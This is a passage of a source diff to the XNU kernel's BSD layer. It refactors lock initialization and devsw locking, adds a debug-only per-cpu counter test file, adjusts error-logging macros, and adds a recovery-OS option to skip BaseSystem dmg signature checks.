bsd_rooted_ramdisk(void) return is_ramdisk; } -/* - * This function is called before IOKit initialization, so that globals - * like the sysctl tree are initialized before kernel extensions - * are started (since they may want to register sysctls - */ -void -bsd_early_init(void) -{ - sysctl_early_init(); -} - /* * This function is called very early on in the Mach startup, from the * function start_kernel_threads() in osfmk/kern/startup.c. 
It's called @@ -562,9 +535,6 @@ bsd_init(void) bsd_init_kprintf("calling procinit\n"); procinit(); - /* Initialize the ttys (MUST be before kminit()/bsd_autoconf()!)*/ - tty_init(); - /* kernel_task->proc = kernproc; */ set_bsdtask_info(kernel_task, (void *)kernproc); @@ -572,38 +542,15 @@ bsd_init(void) bsd_init_kprintf("calling process_name\n"); process_name("kernel_task", kernproc); - /* allocate proc lock group attribute and group */ - bsd_init_kprintf("calling lck_grp_attr_alloc_init\n"); - proc_lck_grp_attr = lck_grp_attr_alloc_init(); - - proc_lck_grp = lck_grp_alloc_init("proc", proc_lck_grp_attr); - - proc_slock_grp = lck_grp_alloc_init("proc-slock", proc_lck_grp_attr); - proc_ucred_mlock_grp = lck_grp_alloc_init("proc-ucred-mlock", proc_lck_grp_attr); - proc_mlock_grp = lck_grp_alloc_init("proc-mlock", proc_lck_grp_attr); - proc_fdmlock_grp = lck_grp_alloc_init("proc-fdmlock", proc_lck_grp_attr); - proc_kqhashlock_grp = lck_grp_alloc_init("proc-kqhashlock", proc_lck_grp_attr); - proc_knhashlock_grp = lck_grp_alloc_init("proc-knhashlock", proc_lck_grp_attr); - proc_dirslock_grp = lck_grp_alloc_init("proc-dirslock", proc_lck_grp_attr); -#if CONFIG_XNUPOST - sysctl_debug_test_stackshot_owner_grp = lck_grp_alloc_init("test-stackshot-owner-grp", LCK_GRP_ATTR_NULL); - sysctl_debug_test_stackshot_owner_init_mtx = lck_mtx_alloc_init( - sysctl_debug_test_stackshot_owner_grp, - LCK_ATTR_NULL); -#endif /* !CONFIG_XNUPOST */ /* Allocate proc lock attribute */ - proc_lck_attr = lck_attr_alloc_init(); - proc_list_mlock = lck_mtx_alloc_init(proc_mlock_grp, proc_lck_attr); - proc_klist_mlock = lck_mtx_alloc_init(proc_mlock_grp, proc_lck_attr); - lck_mtx_init(&kernproc->p_mlock, proc_mlock_grp, proc_lck_attr); - lck_mtx_init(&kernproc->p_fdmlock, proc_fdmlock_grp, proc_lck_attr); - lck_mtx_init(&kernproc->p_ucred_mlock, proc_ucred_mlock_grp, proc_lck_attr); - lck_spin_init(&kernproc->p_slock, proc_slock_grp, proc_lck_attr); - lck_rw_init(&kernproc->p_dirs_lock, 
proc_dirslock_grp, proc_lck_attr); + lck_mtx_init(&kernproc->p_mlock, &proc_mlock_grp, &proc_lck_attr); + lck_mtx_init(&kernproc->p_fdmlock, &proc_fdmlock_grp, &proc_lck_attr); + lck_mtx_init(&kernproc->p_ucred_mlock, &proc_ucred_mlock_grp, &proc_lck_attr); + lck_spin_init(&kernproc->p_slock, &proc_slock_grp, &proc_lck_attr); + lck_rw_init(&kernproc->p_dirs_lock, &proc_dirslock_grp, &proc_lck_attr); assert(bsd_simul_execs != 0); - execargs_cache_lock = lck_mtx_alloc_init(proc_lck_grp, proc_lck_attr); execargs_cache_size = bsd_simul_execs; execargs_free_count = bsd_simul_execs; execargs_cache = zalloc_permanent(bsd_simul_execs * sizeof(vm_offset_t), @@ -634,10 +581,6 @@ bsd_init(void) ulock_initialize(); - hostname_lck_grp = lck_grp_alloc_init("hostname", LCK_GRP_ATTR_NULL); - lck_mtx_init(&hostname_lock, hostname_lck_grp, LCK_ATTR_NULL); - lck_mtx_init(&domainname_lock, hostname_lck_grp, LCK_ATTR_NULL); - /* * Create process 0. */ @@ -646,7 +589,7 @@ bsd_init(void) kernproc->p_pgrp = &pgrp0; LIST_INSERT_HEAD(PGRPHASH(0), &pgrp0, pg_hash); LIST_INIT(&pgrp0.pg_members); - lck_mtx_init(&pgrp0.pg_mlock, proc_mlock_grp, proc_lck_attr); + lck_mtx_init(&pgrp0.pg_mlock, &proc_mlock_grp, &proc_lck_attr); /* There is no other bsd thread this point and is safe without pgrp lock */ LIST_INSERT_HEAD(&pgrp0.pg_members, kernproc, p_pglist); kernproc->p_listflag |= P_LIST_INPGRP; @@ -659,7 +602,7 @@ bsd_init(void) session0.s_count = 1; session0.s_leader = kernproc; session0.s_listflags = 0; - lck_mtx_init(&session0.s_mlock, proc_mlock_grp, proc_lck_attr); + lck_mtx_init(&session0.s_mlock, &proc_mlock_grp, &proc_lck_attr); LIST_INSERT_HEAD(SESSHASH(0), &session0, s_hash); proc_list_unlock(); @@ -729,9 +672,6 @@ bsd_init(void) TAILQ_INIT(&kernproc->p_aio_doneq); kernproc->p_aio_total_count = 0; - bsd_init_kprintf("calling file_lock_init\n"); - file_lock_init(); - #if CONFIG_MACF mac_cred_label_associate_kernel(kernproc->p_ucred); #endif @@ -743,8 +683,8 @@ bsd_init(void) 
filedesc0.fd_knlist = NULL; filedesc0.fd_knhash = NULL; filedesc0.fd_knhashmask = 0; - lck_mtx_init(&filedesc0.fd_kqhashlock, proc_kqhashlock_grp, proc_lck_attr); - lck_mtx_init(&filedesc0.fd_knhashlock, proc_knhashlock_grp, proc_lck_attr); + lck_mtx_init(&filedesc0.fd_kqhashlock, &proc_kqhashlock_grp, &proc_lck_attr); + lck_mtx_init(&filedesc0.fd_knhashlock, &proc_knhashlock_grp, &proc_lck_attr); /* Create the limits structures. */ kernproc->p_limit = &limit0; @@ -792,9 +732,6 @@ bsd_init(void) } } - bsd_init_kprintf("calling fpxlog_init\n"); - fpxlog_init(); - /* * Initialize buffers and hash links for buffers * @@ -815,10 +752,6 @@ bsd_init(void) bsd_init_kprintf("calling vfsinit\n"); vfsinit(); - /* Initialize file locks. */ - bsd_init_kprintf("calling lf_init\n"); - lf_init(); - #if CONFIG_PROC_UUID_POLICY /* Initial proc_uuid_policy subsystem */ bsd_init_kprintf("calling proc_uuid_policy_init()\n"); @@ -857,34 +790,12 @@ bsd_init(void) bsd_init_kprintf("calling aio_init\n"); aio_init(); - /* Initialize SysV shm subsystem locks; the subsystem proper is - * initialized through a sysctl. 
- */ -#if SYSV_SHM - bsd_init_kprintf("calling sysv_shm_lock_init\n"); - sysv_shm_lock_init(); -#endif -#if SYSV_SEM - bsd_init_kprintf("calling sysv_sem_lock_init\n"); - sysv_sem_lock_init(); -#endif -#if SYSV_MSG - bsd_init_kprintf("sysv_msg_lock_init\n"); - sysv_msg_lock_init(); -#endif - bsd_init_kprintf("calling pshm_lock_init\n"); - pshm_lock_init(); - bsd_init_kprintf("calling psem_lock_init\n"); - psem_lock_init(); - pthread_init(); /* POSIX Shm and Sem */ bsd_init_kprintf("calling pshm_cache_init\n"); pshm_cache_init(); bsd_init_kprintf("calling psem_cache_init\n"); psem_cache_init(); - bsd_init_kprintf("calling time_zone_slock_init\n"); - time_zone_slock_init(); bsd_init_kprintf("calling select_waitq_init\n"); select_waitq_init(); @@ -920,6 +831,10 @@ bsd_init(void) kernproc->p_fd->fd_cdir = NULL; kernproc->p_fd->fd_rdir = NULL; +#if defined (__x86_64__) && (DEBUG || DEVELOPMENT) + hvg_bsd_init(); +#endif /* DEBUG || DEVELOPMENT */ + #if CONFIG_FREEZE #ifndef CONFIG_MEMORYSTATUS #error "CONFIG_FREEZE defined without matching CONFIG_MEMORYSTATUS" @@ -935,18 +850,12 @@ bsd_init(void) memorystatus_init(); #endif /* CONFIG_MEMORYSTATUS */ - bsd_init_kprintf("calling acct_init\n"); - acct_init(); - bsd_init_kprintf("calling sysctl_mib_init\n"); sysctl_mib_init(); bsd_init_kprintf("calling bsd_autoconf\n"); bsd_autoconf(); - bsd_init_kprintf("calling os_reason_init\n"); - os_reason_init(); - #if CONFIG_DTRACE dtrace_postinit(); #endif @@ -1057,9 +966,9 @@ bsd_init(void) (void)vnode_ref(init_rootvnode); (void)vnode_put(init_rootvnode); - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); set_rootvnode(init_rootvnode); - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); init_rootvnode = NULLVP; /* use rootvnode after this point */ @@ -1176,6 +1085,7 @@ bsd_init(void) if (bsdmgroot_bootable()) { int error; bool rooted_dmg = false; + bool skip_signature_check = false; printf("trying to 
find and mount BaseSystem dmg as root volume\n"); #if DEVELOPMENT || DEBUG @@ -1188,7 +1098,7 @@ bsd_init(void) panic("%s: M_NAMEI zone exhausted", __FUNCTION__); } - error = bsd_find_basesystem_dmg(dmgpath, &rooted_dmg); + error = bsd_find_basesystem_dmg(dmgpath, &rooted_dmg, &skip_signature_check); if (error) { bsd_init_kprintf("failed to to find BaseSystem dmg: error = %d\n", error); } else { @@ -1196,7 +1106,7 @@ bsd_init(void) bsd_init_kprintf("found BaseSystem dmg at: %s\n", dmgpath); - error = imageboot_pivot_image(dmgpath, IMAGEBOOT_DMG, "/System/Volumes/BaseSystem", "System/Volumes/macOS", rooted_dmg); + error = imageboot_pivot_image(dmgpath, IMAGEBOOT_DMG, "/System/Volumes/BaseSystem", "System/Volumes/macOS", rooted_dmg, skip_signature_check); if (error) { bsd_init_kprintf("couldn't mount BaseSystem dmg: error = %d", error); } @@ -1246,9 +1156,6 @@ bsd_init(void) consider_zone_gc(FALSE); #endif - /* Initialize System Override call */ - init_system_override(); - bsd_init_kprintf("done\n"); } @@ -1361,6 +1268,9 @@ bsd_utaskbootstrap(void) panic("bsd_utaskbootstrap: initproc not set\n"); } #endif + + zalloc_first_proc_made(); + /* * Since we aren't going back out the normal way to our parent, * we have to drop the transition locks explicitly. @@ -1475,12 +1385,6 @@ parse_bsd_args(void) } #endif -#if OS_REASON_DEBUG - if (PE_parse_boot_argn("-disable_osreason_debug", namep, sizeof(namep))) { - os_reason_debug_disabled = 1; - } -#endif - PE_parse_boot_argn("sigrestrict", &sigrestrict_arg, sizeof(sigrestrict_arg)); #if DEVELOPMENT || DEBUG @@ -1585,20 +1489,26 @@ extern const char *IOGetBootObjectsPath(void); // BaseSystem.dmg into its argument (which must be a char[MAXPATHLEN]). 
static int -bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg) +bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg, bool *skip_signature_check) { int error; size_t len; char *dmgbasepath; char *dmgpath; + bool allow_rooted_dmg = false; dmgbasepath = zalloc_flags(ZV_NAMEI, Z_ZERO | Z_WAITOK); dmgpath = zalloc_flags(ZV_NAMEI, Z_ZERO | Z_WAITOK); vnode_t imagevp = NULLVP; +#if DEVELOPMENT || DEBUG + allow_rooted_dmg = true; +#endif + //must provide output bool - if (rooted_dmg) { + if (rooted_dmg && skip_signature_check) { *rooted_dmg = false; + *skip_signature_check = false; } else { error = EINVAL; goto done; @@ -1615,6 +1525,11 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg) goto done; } + if (csr_check(CSR_ALLOW_ANY_RECOVERY_OS) == 0) { + *skip_signature_check = true; + allow_rooted_dmg = true; + } + #if defined(__arm64__) const char *boot_obj_path = IOGetBootObjectsPath(); if (boot_obj_path) { @@ -1634,26 +1549,27 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg) goto done; } -#if DEVELOPMENT || DEBUG - len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); - if (len > MAXPATHLEN) { - error = ENAMETOOLONG; - goto done; - } + if (allow_rooted_dmg) { + len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); + if (len > MAXPATHLEN) { + error = ENAMETOOLONG; + goto done; + } - len = strlcat(dmgpath, "arm64eBaseSystem.rooted.dmg", MAXPATHLEN); - if (len > MAXPATHLEN) { - error = ENAMETOOLONG; - goto done; - } + len = strlcat(dmgpath, "arm64eBaseSystem.rooted.dmg", MAXPATHLEN); + if (len > MAXPATHLEN) { + error = ENAMETOOLONG; + goto done; + } - error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel()); - if (error == 0) { - *rooted_dmg = true; - goto done; + error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel()); + if (error == 0) { + *rooted_dmg = true; + *skip_signature_check = true; + goto done; + } + memset(dmgpath, 0, MAXPATHLEN); } - memset(dmgpath, 0, MAXPATHLEN); -#endif // DEVELOPMENT || DEBUG len = 
strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); if (len > MAXPATHLEN) { @@ -1688,27 +1604,28 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg) goto done; } -#if DEVELOPMENT || DEBUG - // Try BaseSystem.rooted.dmg - len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); - if (len > MAXPATHLEN) { - error = ENAMETOOLONG; - goto done; - } + if (allow_rooted_dmg) { + // Try BaseSystem.rooted.dmg + len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); + if (len > MAXPATHLEN) { + error = ENAMETOOLONG; + goto done; + } - len = strlcat(dmgpath, "/BaseSystem.rooted.dmg", MAXPATHLEN); - if (len > MAXPATHLEN) { - error = ENAMETOOLONG; - goto done; - } + len = strlcat(dmgpath, "/BaseSystem.rooted.dmg", MAXPATHLEN); + if (len > MAXPATHLEN) { + error = ENAMETOOLONG; + goto done; + } - error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel()); - if (error == 0) { - // we found it! success! - *rooted_dmg = true; - goto done; + error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel()); + if (error == 0) { + // we found it! success! 
+ *rooted_dmg = true; + *skip_signature_check = true; + goto done; + } } -#endif // DEVELOPMENT || DEBUG // Try BaseSystem.dmg len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN); diff --git a/bsd/kern/bsd_stubs.c b/bsd/kern/bsd_stubs.c index 3b8290fc5..a08f4c823 100644 --- a/bsd/kern/bsd_stubs.c +++ b/bsd/kern/bsd_stubs.c @@ -45,40 +45,25 @@ /* XXX these should be in a common header somwhere, but aren't */ extern int chrtoblk_set(int, int); -extern vm_offset_t kmem_mb_alloc(vm_map_t, int, int, kern_return_t *); /* XXX most of these just exist to export; there's no good header for them*/ void pcb_synch(void); -TAILQ_HEAD(, devsw_lock) devsw_locks; -lck_mtx_t devsw_lock_list_mtx; -lck_grp_t * devsw_lock_grp; +typedef struct devsw_lock { + TAILQ_ENTRY(devsw_lock) dl_list; + thread_t dl_thread; + dev_t dl_dev; + int dl_mode; + int dl_waiters; +} *devsw_lock_t; + +static LCK_GRP_DECLARE(devsw_lock_grp, "devsw"); +static LCK_MTX_DECLARE(devsw_lock_list_mtx, &devsw_lock_grp); +static TAILQ_HEAD(, devsw_lock) devsw_locks = TAILQ_HEAD_INITIALIZER(devsw_locks); /* Just to satisfy pstat command */ int dmmin, dmmax, dmtext; -vm_offset_t -kmem_mb_alloc(vm_map_t mbmap, int size, int physContig, kern_return_t *err) -{ - vm_offset_t addr = 0; - kern_return_t kr = KERN_SUCCESS; - - if (!physContig) { - kr = kernel_memory_allocate(mbmap, &addr, size, 0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF); - } else { - kr = kmem_alloc_contig(mbmap, &addr, size, PAGE_MASK, 0xfffff, 0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF); - } - - if (kr != KERN_SUCCESS) { - addr = 0; - } - if (err) { - *err = kr; - } - - return addr; -} - /* * XXX this function only exists to be exported and do nothing. 
*/ @@ -366,72 +351,84 @@ bsd_hostname(char *buf, size_t bufsize, size_t *len) return ret; } +static devsw_lock_t +devsw_lock_find_locked(dev_t dev, int mode) +{ + devsw_lock_t lock; + + TAILQ_FOREACH(lock, &devsw_locks, dl_list) { + if (lock->dl_dev == dev && lock->dl_mode == mode) { + return lock; + } + } + + return NULL; +} + void devsw_lock(dev_t dev, int mode) { - devsw_lock_t newlock, tmplock; - int res; + devsw_lock_t newlock, curlock; assert(0 <= major(dev) && major(dev) < nchrdev); assert(mode == S_IFCHR || mode == S_IFBLK); - MALLOC(newlock, devsw_lock_t, sizeof(struct devsw_lock), M_TEMP, M_WAITOK | M_ZERO); + newlock = kalloc_flags(sizeof(struct devsw_lock), Z_WAITOK | Z_ZERO); newlock->dl_dev = dev; newlock->dl_thread = current_thread(); newlock->dl_mode = mode; lck_mtx_lock_spin(&devsw_lock_list_mtx); -retry: - TAILQ_FOREACH(tmplock, &devsw_locks, dl_list) - { - if (tmplock->dl_dev == dev && tmplock->dl_mode == mode) { - res = msleep(tmplock, &devsw_lock_list_mtx, PVFS, "devsw_lock", NULL); - assert(res == 0); - goto retry; - } + + curlock = devsw_lock_find_locked(dev, mode); + if (curlock == NULL) { + TAILQ_INSERT_TAIL(&devsw_locks, newlock, dl_list); + } else { + curlock->dl_waiters++; + lck_mtx_sleep_with_inheritor(&devsw_lock_list_mtx, + LCK_SLEEP_SPIN, curlock, curlock->dl_thread, + THREAD_UNINT | THREAD_WAIT_NOREPORT, + TIMEOUT_WAIT_FOREVER); + assert(curlock->dl_thread == current_thread()); + curlock->dl_waiters--; } - TAILQ_INSERT_TAIL(&devsw_locks, newlock, dl_list); lck_mtx_unlock(&devsw_lock_list_mtx); + + if (curlock != NULL) { + kfree(newlock, sizeof(struct devsw_lock)); + } } + void devsw_unlock(dev_t dev, int mode) { - devsw_lock_t tmplock; + devsw_lock_t lock; + thread_t inheritor_thread = NULL; assert(0 <= major(dev) && major(dev) < nchrdev); lck_mtx_lock_spin(&devsw_lock_list_mtx); - TAILQ_FOREACH(tmplock, &devsw_locks, dl_list) - { - if (tmplock->dl_dev == dev && tmplock->dl_mode == mode) { - break; - } - } + lock = 
devsw_lock_find_locked(dev, mode); - if (tmplock == NULL) { - panic("Trying to unlock, and couldn't find lock."); + if (lock == NULL || lock->dl_thread != current_thread()) { + panic("current thread doesn't own the lock (%p)", lock); } - if (tmplock->dl_thread != current_thread()) { - panic("Trying to unlock, but I don't hold the lock."); + if (lock->dl_waiters) { + wakeup_one_with_inheritor(lock, THREAD_AWAKENED, + LCK_WAKE_DEFAULT, &lock->dl_thread); + inheritor_thread = lock->dl_thread; + lock = NULL; + } else { + TAILQ_REMOVE(&devsw_locks, lock, dl_list); } - wakeup(tmplock); - TAILQ_REMOVE(&devsw_locks, tmplock, dl_list); - lck_mtx_unlock(&devsw_lock_list_mtx); - FREE(tmplock, M_TEMP); -} - -void -devsw_init() -{ - devsw_lock_grp = lck_grp_alloc_init("devsw", NULL); - assert(devsw_lock_grp != NULL); - - lck_mtx_init(&devsw_lock_list_mtx, devsw_lock_grp, NULL); - TAILQ_INIT(&devsw_locks); + if (inheritor_thread) { + thread_deallocate(inheritor_thread); + } + kfree(lock, sizeof(struct devsw_lock)); } diff --git a/bsd/kern/counter_test.c b/bsd/kern/counter_test.c new file mode 100644 index 000000000..db9f8ee08 --- /dev/null +++ b/bsd/kern/counter_test.c @@ -0,0 +1,280 @@ +/* * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. 
+ * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +/* sysctl interface for testing percpu counters in DEBUG or DEVELOPMENT kernel only. */ +#if !(DEVELOPMENT || DEBUG) +#error "Counter testing is not enabled on RELEASE configurations" +#endif + +#include +#include +#include +#include +#include +#include + +#include + +#ifdef CONFIG_XNUPOST +#include +#endif /* CONFIG_XNUPOST */ + +static _Atomic boolean_t scalable_counter_test_running = FALSE; +scalable_counter_t test_scalable_counter; + +SCALABLE_COUNTER_DEFINE(test_static_scalable_counter); + +#ifdef CONFIG_XNUPOST +kern_return_t counter_tests(void); +/* + * Sanity test that a counter can be modified before zalloc is initialized. 
+ */ +static void +bump_static_counter(void* arg) +{ + (void) arg; + counter_inc(&test_static_scalable_counter); +} + +STARTUP_ARG(PMAP_STEAL, STARTUP_RANK_MIDDLE, bump_static_counter, NULL); + +kern_return_t +counter_tests() +{ + T_ASSERT_EQ_ULLONG(counter_load(&test_static_scalable_counter), 1, "Counter was incremented"); + return KERN_SUCCESS; +} +#endif /* CONFIG_XNUPOST */ + +static int +sysctl_scalable_counter_test_start SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int ret_val = 1; + int error = 0; + boolean_t exclusive; + error = sysctl_io_number(req, ret_val, sizeof(int), &ret_val, NULL); + if (error || !req->newptr) { + return error; + } + /* The test doesn't support being run multiple times in parallel. */ + exclusive = os_atomic_cmpxchg(&scalable_counter_test_running, FALSE, TRUE, seq_cst); + if (!exclusive) { + os_log(OS_LOG_DEFAULT, "scalable_counter_test: Caught attempt to run the test in parallel."); + return EINVAL; + } + counter_alloc(&test_scalable_counter); + return 0; +} + +static int +sysctl_scalable_counter_test_finish SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + boolean_t exclusive; + int ret_val = 0; + int error = 0; + error = sysctl_io_number(req, ret_val, sizeof(int), &ret_val, NULL); + if (error || !req->newptr) { + return error; + } + + /* The test doesn't support being run multiple times in parallel. */ + exclusive = os_atomic_cmpxchg(&scalable_counter_test_running, TRUE, FALSE, seq_cst); + if (!exclusive) { + /* Finish called without start. 
*/ + return EINVAL; + } + return 0; +} + +static int +sysctl_scalable_counter_add SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int64_t value = 0; + int error = 0; + if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) { + /* Must call start */ + return EINVAL; + } + error = sysctl_io_number(req, value, sizeof(int64_t), &value, NULL); + if (error || !req->newptr) { + return error; + } + counter_add(&test_scalable_counter, value); + return 0; +} + +static int +sysctl_static_scalable_counter_add SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int64_t value = 0; + int error = 0; + if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) { + /* Must call start */ + return EINVAL; + } + error = sysctl_io_number(req, value, sizeof(int64_t), &value, NULL); + if (error || !req->newptr) { + return error; + } + counter_add(&test_static_scalable_counter, value); + return 0; +} + +static int +sysctl_scalable_counter_load SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + uint64_t value; + if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) { + /* Must call start */ + return EINVAL; + } + value = counter_load(&test_scalable_counter); + return SYSCTL_OUT(req, &value, sizeof(value)); +} + +static int +sysctl_scalable_counter_write_benchmark SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int error; + int64_t iterations; + int ret_val = 0; + if (!os_atomic_load(&scalable_counter_test_running, seq_cst)) { + /* Must call start */ + return EINVAL; + } + error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL); + if (error || !req->newptr) { + return error; + } + for (int64_t i = 0; i < iterations; i++) { + counter_inc(&test_scalable_counter); + } + return 0; +} + +static volatile uint64_t racy_counter; + +static int +sysctl_racy_counter_write_benchmark SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int error; + int64_t iterations; + int ret_val = 0; + error = sysctl_io_number(req, ret_val, 
sizeof(int), &iterations, NULL); + if (error || !req->newptr) { + return error; + } + for (int64_t i = 0; i < iterations; i++) { + racy_counter++; + } + return 0; +} + +static int +sysctl_racy_counter_load SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + uint64_t value = racy_counter; + return SYSCTL_OUT(req, &value, sizeof(value)); +} + +static _Atomic uint64_t atomic_counter; + +static int +sysctl_atomic_counter_write_benchmark SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + int error; + int64_t iterations; + int ret_val = 0; + error = sysctl_io_number(req, ret_val, sizeof(int), &iterations, NULL); + if (error || !req->newptr) { + return error; + } + for (int64_t i = 0; i < iterations; i++) { + os_atomic_add(&atomic_counter, 1, relaxed); + } + return 0; +} + +static int +sysctl_atomic_counter_load SYSCTL_HANDLER_ARGS +{ +#pragma unused(oidp, arg1, arg2) + uint64_t value = os_atomic_load_wide(&atomic_counter, relaxed); + return SYSCTL_OUT(req, &value, sizeof(value)); +} + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_start, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_scalable_counter_test_start, "I", "Setup per-cpu counter test"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_finish, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_scalable_counter_test_finish, "I", "Finish per-cpu counter test"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_add, + CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_scalable_counter_add, "I", "Perform an add on the per-cpu counter"); + +SYSCTL_PROC(_kern, OID_AUTO, static_scalable_counter_test_add, + CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_static_scalable_counter_add, "I", "Perform an add on the static per-cpu counter"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_test_load, + CTLTYPE_QUAD | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, 
sysctl_scalable_counter_load, "I", "Load the current per-cpu counter value."); + +SYSCTL_SCALABLE_COUNTER(_kern, static_scalable_counter_test_load, + test_static_scalable_counter, "Load the current static per-cpu counter value."); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_write_benchmark, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_scalable_counter_write_benchmark, "I", "Per-cpu counter write benchmark"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_racy_counter_benchmark, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_racy_counter_write_benchmark, "I", "Global counter racy benchmark"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_racy_counter_load, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_racy_counter_load, "I", "Global counter racy load"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_atomic_counter_write_benchmark, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_atomic_counter_write_benchmark, "I", "Atomic counter write benchmark"); + +SYSCTL_PROC(_kern, OID_AUTO, scalable_counter_atomic_counter_load, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED | CTLFLAG_LOCKED, + 0, 0, sysctl_atomic_counter_load, "I", "Atomic counter load"); diff --git a/bsd/kern/decmpfs.c b/bsd/kern/decmpfs.c index 4040d9b6a..1f5bc434f 100644 --- a/bsd/kern/decmpfs.c +++ b/bsd/kern/decmpfs.c @@ -80,22 +80,6 @@ UNUSED_SYMBOL(decmpfs_validate_compressed_file) #define COMPRESSION_DEBUG_VERBOSE 0 #define MALLOC_DEBUG 0 -static const char * -baseName(const char *path) -{ - if (!path) { - return NULL; - } - const char *ret = path; - int i; - for (i = 0; path[i] != 0; i++) { - if (path[i] == '/') { - ret = &path[i + 1]; - } - } - return ret; -} - #if COMPRESSION_DEBUG static char* vnpath(vnode_t vp, char *path, int len) @@ -108,11 +92,21 @@ vnpath(vnode_t vp, char *path, int len) } #endif -#define ErrorLog(x, args...) 
printf("%s:%d:%s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, ## args) +#define ErrorLog(x, args...) \ + printf("%s:%d:%s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, ## args) #if COMPRESSION_DEBUG -#define ErrorLogWithPath(x, args...) do { char *path; MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK); printf("%s:%d:%s: %s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, vnpath(vp, path, PATH_MAX), ## args); FREE(path, M_TEMP); } while(0) +#define ErrorLogWithPath(x, args...) do { \ + char *path = zalloc(ZV_NAMEI); \ + printf("%s:%d:%s: %s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, \ + vnpath(vp, path, PATH_MAX), ## args); \ + zfree(ZV_NAMEI, path); \ +} while(0) #else -#define ErrorLogWithPath(x, args...) do { (void*)vp; printf("%s:%d:%s: %s: " x, baseName(__FILE__), __LINE__, __FUNCTION__, "", ## args); } while(0) +#define ErrorLogWithPath(x, args...) do { \ + (void*)vp; \ + printf("%s:%d:%s: %s: " x, __FILE_NAME__, __LINE__, __FUNCTION__, \ + "", ## args); \ +} while(0) #endif #if COMPRESSION_DEBUG @@ -131,88 +125,14 @@ vnpath(vnode_t vp, char *path, int len) #define 